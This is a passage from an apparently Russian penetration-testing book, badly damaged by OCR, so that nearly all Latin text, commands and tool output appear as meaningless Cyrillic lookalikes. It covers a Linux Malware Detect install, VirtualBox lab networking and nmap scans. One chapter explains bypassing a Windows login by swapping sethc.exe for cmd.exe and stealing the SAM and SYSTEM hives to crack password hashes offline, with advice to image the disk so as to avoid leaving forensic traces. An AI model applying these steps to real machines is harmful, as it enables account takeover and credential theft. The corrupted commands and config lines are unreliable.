Хотелось бы, чтобы в следующее обновление добавили: 

• Добротный НТМІ- отчёт (с раскрывающимися секциями). 

• Тест на целостность файловой системы и пакетов. 

• Добавление ссылок на СѴЕ статьи — очень бы пригодилось с НТМІ. отчётом. 
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• Высокоуровневый обзор для высшего управления. 

• 5СШ тесты и предложения для базы данных серверов. 

• Подробнее о вероятных решениях/предложениях. 

• Пропуск теста, когда файлы сопЯ§/іпсІисІе имеют некорректный путь. 

Заключение 

В целом, я думаю это хороший инструмент, который нужно иметь хотя бы для 
автоматизации большого количества тестов. Всё можно улучшить, и І_упІ5 не 
исключение. Любой сервер, будь то Ыпих, ѴѴіпсІоѵѵз или ІІпіх требует регулярного 
аудита. Хотя нет спасения от уязвимости нулевого дня, но с регулярным аудитом вы 
сможете сохранить ваши ценные ресурсы. І_упІ5 — это хороший инструмент, но вам 
следует использовать более чем один инструмент хотя бы потому, что различные 
поставщики (или разработчики софта) имеют различный взгляд на безопасность. А нам 
важно обеспечить безопасность сервера с высоким аптаймом и надёжно 
защищёнными данными. 

Инструмент: І_упІ5 

Страница проекта: ИНрУ/сізо^у.сот/Іупіз/ 

Использование: Бесплатно 
Лицензия: 0РІ_ѵЗ 

Загрузка ИНрУ/сізо^у.сот/сІоѵѵпІоасІз/ 

Итак, делайте аудит своей системы и исправьте все оставшиеся проблемы, которые, по 
вашему мнению, могут затронуть вас. 


Глава 49. Установка Ыпих Маіѵѵаге Реіесі (ЫѴЮ) на Ыпих 

Вся инструкция применима, пожалуй, к любому дистрибутиву Ыпих, по крайней 
мере, проверялось и точно работает на КНЕІ., СепЮ5, Ресіога, ОеЬіап, ІІЬипІи, Міпі. 

В своей более ранней статье я объяснял, как вы можете защитить сервер Арасбе от 
вредоносных и 005 атак, используя тосІ_5есигі1:у и тосІ_еѵа$іѵе. Теперь я хочу поднять 
тему выявления вредоносного кода с использованием І.ІѴЮ (Ыпих Маіѵѵаге Оеіесі:). 

Что такое Маіѵѵаге? 

Маіѵѵаге (мэлвэром) называют вредоносные программы, скрипты или код, которые 
создаются и используются хакерами для получения информации из частных данных 
или получения доступа к любой частной компьютерной системе. Мэлвэа (таіѵѵаге) 
может быть троянами, вирусами, шпионскими программами, рекламными модулями, 
руткитами или любыми вредоносными программами, которые могут быть очень 
пагубными для пользователей компьютера. 

Что такое Ыпих Маіѵѵаге Оеіесі (ЫѴЮ)? 

Ыпих Маіѵѵаге Оеіесі (ЬМй) — это бесплатный, с открытым исходным кодом сканер 
вредоносных программ для основанных на Ііпіх/Ыпих операционных систем, 
выпущенный под лицензией ОІМІІ 0РІ_ѵ2. Он создан для выявления угроз, которые 
могут возникнуть в условиях хостинга. К примеру, проникнув на ваш сервер, хакер 
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оставит на нём программу, позволяющую ему подключаться к вашему серверу, 
контролировать его, менять настройки, скачивать/закачивать/модифицировать файлы 
и базы данных. Именно для обнаружения подобных вредоносных программ и 
предназначен Ыпих Маіѵѵаге Оеіесі. Для более подробной информации посетите 
официальный сайт НіІр://\м\м\м.гіхп.сот/ргоіесІ5/Ііпих-таІѵѵаге-сІеІесі/ . 

Установка Ыпих Маіѵѵаге Оеіесі (ЬМй) в КНЕІ., СепЮЗ, Ресіога, йеЫап, 
ІІЬипІи, Міпі. 


Шаг 1: Загрузка Ыпих Маіѵѵаге Оеіесі (ЫѴЮ) 

Загружаем последнюю версию пакета І.ІѴЮ, используя следующую команду \л/§еТ. 


1| 

ссі /ітр 

2 1 

\л/§еі Ыір://ѵѵѵѵѵѵ.г1 : хп.сот/сІоѵѵпІоасІ5/таІсІеіесі-сиггепі.іаг.§2 


Шаг 2: Установка І.МО 

Установка и настройка ЫѴЮ — это предельно простая задача, просто выполните 
следующие шаги как рут пользователь. 


1| 

іаг хіі таІсІеіесі-сиггепі.іаг .§2 

2 1 

ссі таісіеіесі-* 

3| 

./іпзіаІІ.зН 

Внимание, на ОеЬіап, ІІЬипіи, Міпі (и всем подобным, кто использует зисіо) нужно 
вместо команды: 

1| 

./іпзіаІІ.зіі 

Выполнить: 

1| 

51ІСІО ./іпзіаІІ.зіі 


Всё остальное идентично, поскольку не требует рут-прав. 


Образец вывода: 

ТегтіпаІ — + х 


Ыпих Маімаге Реіесі ѵі.4.2 

(С) 2002-2013, К-Тх ІЧеімогкз <рго]@г-іх.огд> 

(С) 2013, Куап Масбопаісі <гуап@г-Тх.огд> 
іпоіііумаіі (С) 20Ѳ7, КоЬап Мсбоѵегп <го)іап@тсдоѵегп.і(і.аи> 

ТШ5 ргодгаш пау Ье ігееіу гесіі5ігіЬиіесі ипсіег іііе іегтз оі іііе ОИСІ бРЬ 

іпвіаііаііоп сотріеіесі Іо /изг/іосаі/таісіеіесі 
сопТід Тііе: /ив г/іосаі/таісіеіесі/сопі. таісіеі 
ехес іііе: /иБГ/ІосаІ/таІсіеіесІ/таІсіеІ 
ехес Ііпк: /и5г/ІосаІ/5Ьіп/таІсІеІ 
ехес Ііпк: /изг/ІосаІ/зЬіп/Ітсі 
с гоп . (іаііу: /еіс/с гоп . сіаііу/таісіеі 

таісіеі: (2271): {іідир} регіогтіпд зідпаіиге ирсіаіе сііеск... 

таісіеі (2271): {зідир} Іосаі Бідпаіиге $еі І5 ѵегзіоп 2012Ѳ5Ѳ35915 

таісіеі(2271): {зідир} пеы зідпаіиге $еі (2Ѳ1412271654Ѳ) аѵаіІаЬІе 

таісіеі (2271): {зідир} сіошіоасіесі Иіір://ссіп. гіхп. сот/ сіомпІоасІБ/тсІЬ.сіаі 

таШеі:(2271): {зідир} сіоѵ/піоасіесі НТТр://ссіп. гТхп.сот/сіоѵ/піоасіз/ііех.сіаТ 

таІсІеТ(2271): {зідир} сіоыпіоасіесі ЬТТр://ссіп. гіхп.сот/сіомпІоасІБ/гіхп.псіЬ 

1431(161(2271): {зідир} сіоѵ/піоасіесі іііір://ссіп. гіхп. сот/ сіоыпІоасіз/гіхп.ЬсіЬ 

таісіеі:(2271): {зідир} еіомпіоасіесі іііір://ссіп. гіхп. сот/сіомпіоасіз/таісіеі-сіеап.ідг 

таісіеі(2271): {зідир} зідпаіиге зеі ирсіаіе сотріеіесі 

таісіеі(2271): {зідир} 11866 зідпаіигез (9965 кЮ5 / 1901 НЕХ) 

[тіаіізтіаі-ѵігіиаівох /ітр/таісіеіесі-і.4.2 $ |_ 
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Шаг 3: Настройка ЫѴЮ 


По умолчанию, все опции в файле конфигурационном файле полностью 
закомментированы, следовательно, настройте его под ваши нужды. Но перед тем, как 
делать какие-либо изменения, ниже давайте кратко ознакомимся с каждой опцией. 

• етаіІ_аІегІ : Если вы хотите получать предупреждения по почте, тогда 
установите на 1. 

• етаіІ_5иЬі : Задайте здесь тему письма. 

• етаіІ_асІсІг : Здесь добавьте ваш адрес электронной почты для получения 
уведомлений о найденных вредоносных программах. 

• яиаг_Ыі$ : Помещать ли в карантин зловредные программы, следует установить 
на 1. 


• диаг_сІеап Очищать ли выявленные вредоносные программы, нужно 
установить 1. 

• яиаг_$іі5р : Приостановить ли аккаунт пользователей, у которых обнаружено 
вредоносная программа, установите по вашим нуждам. 

• яиаг_5и5р_тіпиіс1 : Минимальный изегісі который может быть приостановлен. 

Откройте файл /изг/ІосаІ/таІсІеТесТ/соп^. таісіеі; и сделайте необходимые вам 
изменения. 


1 


ѵі /изг/ІосаІ/таІсІе1;ес1;/сопТ.таІсІе1; 


Образец конфигурации 

Вот мой пример конфигурационного файла: 


1| 

# [ ЕМАИ АІ_ЕРГГ5 ] 

21 

## 

3| 

# ТЬе сІеТаиІТ етаіі аіегі 1о§§1е 

4| 

# [0 = сіізаЫесІ, 1 = епаЫесІ] 

51 

е т а і І_а 1 е гТ=1 

6| 


71 

# ТЬе зиЬіесТ Ііпе Тог етаіі аіегіз 

81 

етаіІ_5иЬі="Обнаружена вредоносная программа на $(Ііо$1:пате)" 

91 


10| 

# ТЬе сІеБТіпаТіоп асісігеззез Тог етаіі аіегіз 

111 

# [ ѵаіиез аге сотта (,) зрасесі ] 

121 

етаіІ_асІсІг="аІехеу@ѵѵеЬ\л/аге.Ьі 2 " 

131 


141 

# 1§поге е-таіі аІегТз Тог герогіз іп ѵѵЫсН аІІ ЫІ5 Ііаѵе Ьееп сіеапес). 

151 

# ТЫ5 і$ ісіеаі оп ѵегу Ьи$у зегѵегз ѵѵігеге сіеапесі ЫІ5 сап сігоѵѵп оиі 
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16 


# оіііег тоге асбопаЫе герогіз. 

17 


етаі1_і§поге_с1еап=0 

18 



19 


## 

20 


# [ СШАВАМТІІМЕ ОРТІОІМ5 ] 

21 


## 

22 


# ТЬе сіеіаиіі циагапііпе асііоп Іог таіѵѵаге ЫІ5 

23 


# [0 = аіегі опіу, 1 = тоѵе Іо циагапііпе &атр; аіегі] 

24 


циаг_Ы1:5=1 

25 



26 


# Тгу Іо сіеап 5Ігіп§ Ьазесі таіѵѵаге іпіесііопз 

27 


# [МОТЕ: циаг_Ыі:5=1 гециігесі] 

28 


# [0 = сіізаЫесІ, 1 = сіеап] 

29 


циаг_сІеап=1 

30 



31 


# ТЬе сіе^аиіі зизрепсі асііоп Іог изегз ѵѵіН Ы1$ 

32 


# СрапеІ зизрепсі ог зеі: зііеіі /ЬіпДаІзе оп поп-СрапеІ 

33 


# [МОТЕ: циаг_Ы1:5=1 гециігесі] 

34 


# [0 = сПзаЫесІ, 1 = зизрепсі ассоипі] 

35 


циаг_зизр=0 

36 


# тіпітит изегісі Ніаі: сап Ье зизрепсіесі 

37 


циаг_5и5р_тіпиісі=500 


Шаг 4: Ручные сканирования и использование 


Если вам хочется просканировать домашнюю директорию пользователей, тогда просто 
выполните следующую команду: 


1 


таісіеі: --зсап-аІІ /Ііоте 


Если вы выполнили сканирование, но забыли включить опцию помещения в карантин, 
не переживайте, просто выполните следующую команду, для переноса в карантин всех 
вредоносных программ из предыдущих результатов: 


1 


# таісіеі: --диагапііпе 5САІМЮ 


Или: 


1 


# таісіеі: -сіеап 5САІМЮ 
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Шаг 5: Ежедневные сканирования 


По умолчанию установка помещает скрипт ЫѴЮ в /еіс/сгоп.сіаііу/таісіеі;, и он 
используется для выполнения ежедневных сканирований, обновления сигнатур, 
карантина и т. д. И для отправки ежедневных сообщения о сканировании зловредных 
программ на заданный вами имейл. Если вам нужно добавить дополнительные пути 
для сканирования, тогда вам следует отрадактировать этот файл в соответствии с 
вашими требованиями: 


1 


ѵі /етс/сгоп.сіаііу/таісіеі: 


Глава 50. Как УЗНАТЬ пароль ѴѴіпсІоѵѵз? 

В этой статье будет описано как узнать пароль от ѴѴіпсІоѵѵз (любых версий), НЕ 
сбросить, НЕ изменить, а именно УЗНАТЬ. 

Сначала отступление 

Сбросить пароль или изменить его в системе \Л/іпсіоѵѵз легко — школьники уже 
наснимали свои стопятьсот видео как это сделать. 

Продвинутые школьники используют ПРО версию программы ЕІсотЗоІі: Зузіет 
Весоѵегу, которая «за пол минуты взламывает пароль» (на самом деле, ищет по 
словарю наиболее популярные пароли, сравнивает их с ранее рассчитанными хэшами 
и, если школьник задал пароль что-нибудь вроде «1», «1111», «123», «абтіп», 
«раззѵѵогсі», то программа его отображает). 

Продвинутые пользователи снимают видео как сбросить пароль с помощью Каіі Ыпих. 
Причём, Каіі Ыпих используется для 1) монтирования диска с ОС ѴѴіпсІоѵѵз, 2) 
переименование одного файла для запуска командной строки... Я думаю, в свободное 
время эти люди колют орехи айфонами. 

На самом деле, я шучу. В 99.99% случаев именно это и нужно — сбросить пароль 
школьника или бухгалтера, которые зачем-то его поставили и благополучно забыли. 

Если вам именно это и нужно, то загрузитесь с любого Ыѵе-диска (это может быть и 
Ыпих - что угодно). В каталоге С:\\Л/іпсІоѵѵ5\5у5Іет32\ переименуйте файл стсі.ехе в 
зеіНс.ехе или в озк.ехе. Понятно, что нужно сделать бэкап файла зеіНс.ехе (или 
озк.ехе), а файл стб.ехе копировать с присвоением нового имени. 

Если вы переименовали файл в зеібс.ехе, то при следующей загрузке ѴѴіпсІоѵѵз, когда у 
вас спросят пароль, нажмите пять раз кнопку 5НІРТ, а если в озк.ехе, то вызовите 
экранную клавиатуру. И в том и в другом случае у вас откроется командная строка 
(стб.ехе) в которой нужно набрать: 


1| 

пеі изег имя_пользователя * 

Т.е. если имя пользователя абтіп, то нужно набрать: 

1| 

пеі: изег асітіп * 


Л т е п е р ь я буду с н имат ь сво ё вид е о. 

Опять шучу. 
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Узнаём пароль \Л/іпсІоѵѵ5 с помощью Каіі Ыпих 
Теория: где ѴУіпсіоѵѵз хранит свои пароли? 


ѴѴіпсІоѵѵз размещает пароли в файле реестра БАМ (Бузіегп Ассоипі: Мапа§етеп1:) 
(система управления аккаунтами). За исключением тех случаев, когда используется 
Асііѵе Оігесіогуіз. Асііѵе ОігесТогуіз — это отдельная система аутентификации, которая 
размещает пароли в базе данных ШАР. Файл 5АМ лежит в 

С:\<5у51етгоо1>\5у51ет32\сопЯ§\ (С:\<5у5ІетгооІ>\зуз32\сопК§\). 

Файл БАМ хранит пароли в виде хэшей, используя хэши 1.М и І\ІТІ_М, чтобы добавить 
безопасности защищаемому файлу. 

Отсюда важное замечание: получение пароля носит вероятностный характре. Если 
удасться расшифровать хэш — то пароль наш, а если нет — то нет... 


Файл БАМ не может быть перемещён или скопирован когда ѴѴіпсІоѵѵз запущена. Файл 
БАМ может быть сдамплен (получен дамп), полученные из него хэши паролей могут 
быть подвержены брут-форсингу для взлома оффлайн. Хакер также может получить 
файл 5АМ загрузившись с другой ОС и смонтировав С:\. Загрузиться можно с 
дистрибутива Ыпих, например Каіі, или загрузиться с Ыѵе-диска. 


Одно общее место для поиска файла 5АМ это С:\<зу$ІетгооІ>\гераіг. По умолчанию 
создаётся бэкап файла 5АМ и обычно он не удаляется системным администратором. 
Бэкап этого файла не защищён, но сжат, это означает, что вам нужно его 
разархивировать, чтобы получить файл с хэшами. Для этого можно использовать 
утилиту ехрапсі. Команда имеет вид Ехрапсі [РНЕ] [ОЕБТІІМАТІОІМ]. Здесь пример 
раскрытия файла БАМ в файл с именем ипсотргеззесІБАМ. 


С:\> ехрапсі БАМ ипсотргеззесІБАМ 


Чтобы улучшить защиту от оффлайн хакинга, МісгозоД ѴѴіпсІоѵѵз 2000 и более поздние 
версии включают утилиту 5Ѵ5КЕѴ. Утилита 5Ѵ5КЕУ зашифровывает хэшированные 
пароли в файле БАМ используя 128-битный ключ шифрования, который разный для 
каждой установленной ѴѴіпсІоѵѵз. 

Атакующий с физическим доступом к системе ѴѴіпсІоѵѵз может получить 5Ѵ5КЕѴ (также 
называймый загрузочный ключ) используя следующие шаги: 

1. Загрузиться с другой ОС (например, с Каіі). 

2. Украсть БАМ и хайвы 5Ѵ5ТЕМ (С:\<зу5ІетгооІ>\5у$Іет32\сопРі§\ 
(С:\<5у5ІетгооІ>\зу532\сопРі§\)). 

3. Восстановить загрузочный ключ из хайвов 5Ѵ5ТЕМ используя Ькге§ или ЬкНіѵе. 

4. Сделать дамп хэшей паролей. 

5. Взломать их оффлан используя инструмент, например такой как .ІоНп іНе Кіррег. 

Ещё одно важное замечание. При каждом доступе к файлам в ѴѴіпсІоѵѵз изменяется 
МАС (модификация, доступ и изменение), который залогирует ваше присутствие. 
Чтобы избежать оставления криминалистических доказательств, рекомендуется 
скопировать целевую систему (сделать образ диска) до запуска атак. 
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Монтирование \Л/іпс)оѵѵ5 


Есть доступные инструменты для захвата ѴѴіпсІоѵѵз-файлов БАМ и файла ключей 5Ѵ5КЕѴ. 
Один из методов захвата этих файлов — это монтирование целевой ѴѴіпсІоѵѵз системы 
так, чтобы другие инструменты имели доступ к этим файлам в то время, пока МісгозоД 
ѴѴіпсІоѵѵз не запущена. 


Первый шаг — это использование команды Ітіізк -I для идентификации ваших разделов. 
Вы должны идентифицировать ѴѴіпсІоѵѵз и тип раздела. Вывод Мізк показывает ІМТР5 
раздел, например так: 


1| 

Оеѵісе Воо! БТагТ ЕпсІ В1оск$ ІсІ Бузіет 

2 1 

/сІеѵ/ЬсІЫ* 1 2432 19535008+ 86 ІМТР5 

3| 

/с)еѵ/Ьс)Ь2 2433 2554 979965 82 Ыпих зѵѵар/БоІагіз 

4| 

/сІеѵ/МЬЗ 2555 6202 29302560 83 Ыпих 


Создаёте точку монтирования используя следующую команду: 


1 


тксііг /тпі/ѵѵіпсіоѵѵз 


Монтируете системный раздел ѴѴіпсІоѵѵз используя команду как показано в следующем 
примере: 


1 


тоиЩ -I <ѴѴІпсІо\л/$Туре> <ѴѴІпсІо\л/5 рагІі1:іоп> /тпі/ѵѵіпсІоѵѵБ 


:~# тксііг /тпі/\лапс1о\л/5 

:~# тоипі -і пі'Гз-Зд /сіѳѵ/Нс1Ь1/тпі/\л/іпс1о\л/5| 


Теперь, когда целевая система ѴѴіпсІоѵѵз смонтирована, вы можете скопировать файлы 
5АМ и 5Ѵ5ТЕМ в вашу директорию для атаки следующей командой: 


1 


ср БАМ 5Ѵ5ТЕМ /репТезТ/раББѵѵогсІз/АТТаскОігесТогу 


Доступны инструменты для дампа файла БАМ. РѵѵОитрапсІ Саіп, АЬеІ и затсіитр — это 
только немногие примеры. 


Обратите внимание, вам нужно восстановить оба файла — загрузочного ключа и БАМ. 
Файл загрузочного ключа используется для доступа к файлу БАМ. Инструменты, 
используемые для доступа к файлу БАМ будут требовать файл загрузочного ключа. 


Ькге§ и ЬкМѵеаге — популярные инструменты, которые помогут получить файл 
загрузчика ключа, как показано на следующем скриншоте: 


ОкГііѵѳ /*іп/міНО0м$/$у$*ет32/С0п7ід/5у$гет кеу,1х* 
ЫФіѵе 1.1.1 Ьу ОЬЗесІіТ Бесигііе 
ітр:/ллл*.осоесііт-5есигне.сгі 
огідіпаі аиІіИог: псиотофіТисіепІі. ипіпа . 1Т 

Кеу 

ОеГаиН Соп1го15е(: ѲѲ2 
ВооТкеу: 
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Как защититься от кражи пароля для входа в \Л/іпсІоѵѵ5: 

• Во-первых, не нужно надеяться на этот пароль. Этот пароль не спасёт вас даже 
от вашего сына-школьника. Этот пароль не поможет вам защитить данные, а 
также бесполезен при краже компьютера. (Ситуация с паролем на ВІ05 
примерно такая же — не предоставляет никакой реальной защиты, время от 
времени портит жизнь бухгалтерам и людям с плохой памятью). 

• Если вам важно ограничить доступ к данным или ко всей системе, используйте 
такие программы шифрования как ѴегаСгурІ: и ТгиеСгурІ: (но если уж вы в этом 
случае забудете пароль, то данные будут безвозвратно утеряны). 

• Чтобы ваш пароль на вход в ѴѴіпсІоѵѵз не могли расшифровать школьники, 
придумывайте сложный, длинный пароль с разными регистрами, цифрами и 
буквами (в том числе русскими) и т. д. Но ещё раз повторю — этот пароль не 
защищает ничего. 


Часть 7. 7. Сканирование сетей. Перехват данных в сетях 

Глава 51. Эмуляция сети из нескольких компьютеров на одном 
компьютере 

Эта инструкция небольшая, но очень полезная. Она пригодится: 

• тестировщикам на проникновение и хакерам: для сканирования с одной 
операционной системы ( Каіі Ыпих) других операционных систем и серверов, 
находящихся на этом же компьютере (сканировать веб-сервера, ОС на 
уязвимости, веб-приложения, тренироваться в перехвате трафика, реализации 
атак человек-по-середине, Х55 и т.д.); 

• системным администраторам: для практики в построении сетей, роутинга 
трафика, отработке взаимодействия между различными компьютерами и 
операционными системами, настройке веб-серверов, почтовых серверов, 0145; 

• разработчикам веб-приложений: для сканирования своих веб-приложений на 
уязвимости, для отработки взаимодействия веб-приложения с другими узлами в 
сети. 

Надеюсь, я вас не запутал. Чтобы стало чуть понятнее, давайте рассмотрим конкретные 
примеры. Мы написали программу на РНР на своей рабочей машине под управлением 
ѴѴіпсІоѵѵз. Мы проверили её работоспособность на локальном сервере под этой самой 
\А/іпсіо\л/5 и теперь мы хотим просканировать программу разнообразными сканерами 
уязвимостей . Проще всего воспользоваться специализированными дистрибутивами, 
например Каіі Ыпих. Но если мы загрузимся в Каіі Ыпих с флешки или установим её в 
качестве второй ОС, то во время работы Каіі наш сервер на \Л/іпсіохл/з будет недоступен 
— напомню, компьютер у нас один. 

Самый простой вариант — это установить Каіі Ыпих в виртуальный компьютер и 
настроить сеть для возможности доступа с виртуальной машины в реальную. 

Думаю, это самая распространённая ситуация. Давайте вместе настроем наш один 
компьютер на возможность сканирования веб-сервера под \Л/іпсіо\л/5 с виртуального 
компьютера на ѴігІиаІВох под управлением Каіі Ыпих. На самом деле, вариаций может 
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быть множество, и взаимодействующих виртуальных компьютеров может быть 
множество. Главное — понять принцип. 

Как из виртуальной машины с Каіі Ыпих просканировать веб-сервер 

\Л/ІПСІОѴѴ5 


Предполагается, что Каіі Ыпих уже установлена в виртуальную машину . 


Первое: узнайте локальный адрес вашей \Л/іпсІо\л/5-машины. Если этот адрес 


динамический (каждый раз новый при включении компьютера, т.е. он получается от 
ОНСР), то рекомендуется прописать статический адрес, иначе после перезагрузки 
компьютера сервер может стать недоступным (для Каіі). 

Чтобы узнать локальный адрес ѴѴіпсІоѵѵз, в командной строке \Л/іпсІо\л/$ наберите: 


ірсопГі§ 


В моём случае это 192.168.1.35 (его я и буду использовать в примерах, чтобы было 
понятнее). 


Второе: в файле настроек сервера (С:\5егѵег\Ьіп\АрасНе24\соггі\НирсІ.соггі) найдите 
строку: 


Ызіеп 127.0.0.1:80 


Можно сделать две вещи: 


• переправить эту строку на Ызіеп *:80 (не рекомендуется, после этого ваш веб¬ 
сервер будет доступен для внешних сетей!); 

• добавить строку Ызіеп локальный_ІР_\Л/іпс!оѵѵ5:80 (рекомендуется); 


В моём случае я добавляю строку: 


І_І5Іеп 192.168.1.35:80 


Сохраняем изменения, перезапускаем сервер. 


Третье: в настройках виртуальной машины перейдите к «настройкам сети». Там по 
умолчанию стоит І\ІАТ, вместо него выберите «сетевой мост». Там, где 
«неразборчивый режим», выберите «разрешить всё». 
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Четвёртое: после этого можно тестировать. Для обращения к серверу используйте 
локальный адрес ѴѴіпсІоѵѵз. Например, в Каіі я набираю в строке браузера 192.168.1.35 
и... Должно работать, но у меня не работает. 


Пятое: Если не получается открыть страницу сервера, то нужно отключить/настроить 


файервол на ѴѴіпсІоѵѵз. 

После отключения файервола, теперь из Каіі виден сервер на ѴѴіпсІоѵѵз. 


Сеть из нескольких виртуальных компьютеров 


Можно настроить множество виртуальных компьютеров с различными 
операционными системами. Их можно запускать и одновременно. Таким образом 
можно потренироваться в настройке программ, серверов на различных дистрибутивах 
Ыпих. Можно один из компьютеров назначить ЭІЧ5 серверов, поиграться с роутингом 
трафика и т. д. 


Чтобы узнать ІР адрес виртуальной машины под управлением Ыпих, наберите в 
командной строке: 


1 


іТсопТі§ 


Каких-то ограничений на количество виртуальных машин нет. Главное, чтобы хватало 
ресурсов реального компьютера. В первую очередь, имеет свойство заканчиваться 
оперативная память. Если вы устанавливаете Ыпих без графической оболочки, то, как 
правило, достаточно 512 мегабайт оперативной памяти. С графической оболочкой я бы 
рекомендовал выбирать 1-1,3 гигабайта оперативной памяти — чтобы работало 
пошустрее. Если на какие-то системы предполагается повышенная нагрузка, то можно 
им вместо одного процессора, выделить 2 или даже 3. Также каждому виртуальному 
компьютеру можно назначить более чем одну сетевую карту — до четырёх. 


Глава 52. Как использовать сканер безопасности ІѴІМАР на Ыпих 

ІЧтар — это бесплатная, с открытым исходным кодом утилита исследования сети и 
проведения аудита безопасности. Она широко используется в сообществе 
пользователей Ыпих, поскольку является простой в применении, но в то же время 
очень мощной. Принцип работы ІЧтар, говоря простым языком, заключается в 
отправке пакетов данных на заданную цель (по ІР) и в интерпретировании 
возвращаемых пакетов для определения, какие порты открыты/закрыты, какие службы 
запущены на сканируемой системе, установлены и включены ли файерволы или 
фильтры и, наконец, какая операционная система запущена. Эти возможности 
позволяют собрать много ценной информации. Давайте рассмотрим некоторые из этих 
возможностей. Кроме типичных для подобных статей примеров команд, будут даны 
рекомендации о том, как использовать собранные во время сканирования данные. 

Установка ІЧтар 

Для начала, нам нужно заполучить пакет "птар" на нашу систему. 

Установка ІЧтар в Каіі Ыпих 

ІЧтар уже установлен. 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Установка ІѴІтар в СепЮБ 


і 


уит іпзТаІІ птар 


Установка ІѴІтар в РеЬіап 


і 


арТ-§е1; іпзіаіі птар 


Установка ІѴІтар в ІІЬипІи 


і 


зисіо арі-деі: іпзіаіі птар 


Использование сканера безопасности ІѴІтар 


Теперь программу можно запускать набрав в терминале "птар". Список опций можно 
посмотреть по команде: 


1 


птар -беір 


Но я рекомендую посмотреть эти же опции по этой ссылке, поскольку там они на 
русском языке. 

Чтобы показать некоторые возможности птар, подготовлены несколько примеров. 
Главная цель — чтобы вы уловили суть и возможности программы. После этого вы 
сможете модифицировать команды под свои собственные нужды. 

Обратите внимание, что программе птар требуются привилегии суперпользователя 
для некоторых её функций. В Каіі Ыпих этого не нужно, но на всех других системах 
запускайте команду с зисіо. В примерах я буду использовать зисіо, в Каіі команды 
выглядят также, но отбрасывайте зисіо. 


Собираем информацию об открытых на сервере портах, запущенных 
службах и версиях программного обеспечения 


Это простая команда может использоваться для проверки доступен ли сайт (в данном 
случае я использовал сайт ѵѵеЬѵѵаге.Ьіг). Обращаем внимание на открытые порты: 


1 


зисіо птар -з5 [ІР адрес] или [адрес веб-сайта] 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


гооІ@ѴѴеЬѴѴаге: — . □ к 


Файл Правка Вид Поиск Терминал Справка 


птар -55 меЬмаге.Ьіг 

БТагТіпд Мтар 6.49ВЕТА4 ( ИТТр5://птар.огд ) аТ 2015-08-28 15:08 М5К 

Мтар $сап герогТ 

Гог меЬѵ/аге.Ьіг (185.26.122.50) 

НозТ І5 ир (0.3І5 ІаТепсу). 

гОМ5 гесогй Тог 185.26.122.50: 5егѵ5Ѳ-26.б05ТІапсі.ги 

N01 5бомп: 986 сіозесі рогТ5 

РОКТ 5ТАТЕ 

5ЕКѴІСЕ 

21/Тср ореп 

ТТр 

25/Тср ореп 

зтТр 

8Ѳ/Тср ореп 

ЬТТр 

111/Тср ореп 

грсЬіпс) 

135/Тср ТіІТегесі 

тзгрс 

139/Тср ТіІТегесІ 

ПеТЬІ05-55П 

443/Тср ореп 

ЬТТр5 

445/Тср ТіІТегесі 

тісго5оТТ-сІ5 

873/Тср ореп 

гзупс 

1022/Тср ореп 

ехр2 

1024/Тср ореп 

ксіт 

2049/Тср ореп 

пТз 

ЗЗѲб/Тср ореп 

тузді 

4443/Тср ореп 

рбагоБ 

Мтар сіопе: 1 ІР айсіге55 (1 бозТ ир) всаппесі іп 467.91 бѳсопсіб 

гооТ@ИеЬИаге:~# 1 



Эта опция даст команду птар попробовать предположить, какая операционная 
система запущена на целевой системе. Если все порты фильтруются, эта команда будет 
лучшим вариантом, но результаты нельзя расценивать как гарантировано надёжные. 
Обратите внимание на проценты — они говорят о вероятности угадывания. 


1 


зіісіо птар -О -055сап-§ие55 [ІР адрес] или [адрес веб-сайта] 


гооТ@ѴѴеЬѴѴаге: — .ох 

Файл Правка Вид Поиск Терминал Справка 


:~# птар -0 --оззсап-диеБЗ 192.168.1.1 

БТагТіпд Мтар 6.49ВЕТА4 ( бТТр5://птар.огд ) аТ 2015-08-28 15:14 М5К 
Мтар 5сап герогТ Тог 192.168.1.1 
НовТ І5 ир (0.000905 ІаТепсу). 

N01 збоѵ/п: 998 сіозеё рогТз 
РОКТ 5ТАТЕ 5ЕКѴІСЕ 
23/Тср ореп ТеІпеТ 
80/Тср ореп бТТр 

МАС Асісігезз: 24:76:70:16:59:0В (Сі$со БрѵТд) 

Оеѵісе Туре: депегаі ригрозе 
Киппіпд: Иіпё Кіѵег ѴхѴ/огкз 
05 СРЕ: сре:/о:ѵйпс1гіѵег:ѵхыогк5 
05 сІеТаіІз: ѴхѴ/огкз 
МеТѵѵогк ОіБТапсе: 1 бор 

05 ёеТесТіоп регТогтей. Ріеазе герогТ апу іпсоггесТ геБиІТз аТ бТТр5://птар.огд/ 
зиЬтіТ/ . 

Мтар сіопе: 1 ІР асісігезз (1 ИозТ ир) зсаппесі іп 24.88 зесопсІБ 
:~# | 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


гооі@ѴѴеЬѴѴаге: — 

Файл Правка Вид Поиск Терминал Справка 


:-# птар -0 --055сап-диез5 192.168.1.33 

ЗТагТіпд Мшар 6.49ВЕТА4 ( ВТТрз://птар.огд ) аТ 2015 -Ѳ8- 28 16:39 М5К 
Мтар 5сап герогТ Тог 192.168.1.33 
Н 05 Т із ир (Ѳ.0ѲѲ5І5 ІаТепсу). 

N01 зВоып: 995 ТіІТегеР рогТз 
РОКТ 5ТАТЕ 5ЕКѴІСЕ 
8Ѳ/Тср ореп ВТТр 
135/Тср ореп шзгрс 
139/Тср ореп пеТЫо5-55П 
443/Тср ореп ВТТр5 
445/Тср ореп шісгозоТТ-Рз 

МАС АРРгезз: 5Ѳ:В7:СЗ:7Ѳ:А8:02 (Башзипд ЕІесТгопісз СО.) 

Ыагпіпд: 055сап гезиІТз шау Ье ипгеІіаЬІе Ьесаизе ые соиісі поТ ТіпР аТ ІеазТ 1 ореп апР 1 сіозер рогТ 
Реѵісе Туре: депегаі ригрозе|рВопе 

Киппіпд (Ю5Т СЕІЕ55ІМС ): МісгозоТТ Міпроыз 7181ѴізТа 1 2ѲѲ8 1РПопе12012 (93%), ЕгееВБР 6.Х (86%) 

05 СРЕ: сре:/о:тісгозоТТ:ыіпРоы5_7::-:ргоТеззіопаІ сре:/о:тісгозоТТ:ыіпРоЫ5_8 сре:/о:тісго5оТТ:ыіпРоыз_ѵізТа: :- сре:/о:ті 
сгозоТТ:ыіпРоы5_ѵізТа: :зр1 сре:/о:тісго5оТТ:ыіпРоыз_зегѵег_2ѲѲ8: :зр1 сре:/о:шісгозоТТ:ыіпРоыз сре:/о:тісгозоТТ:ыіпРоы5_5е 
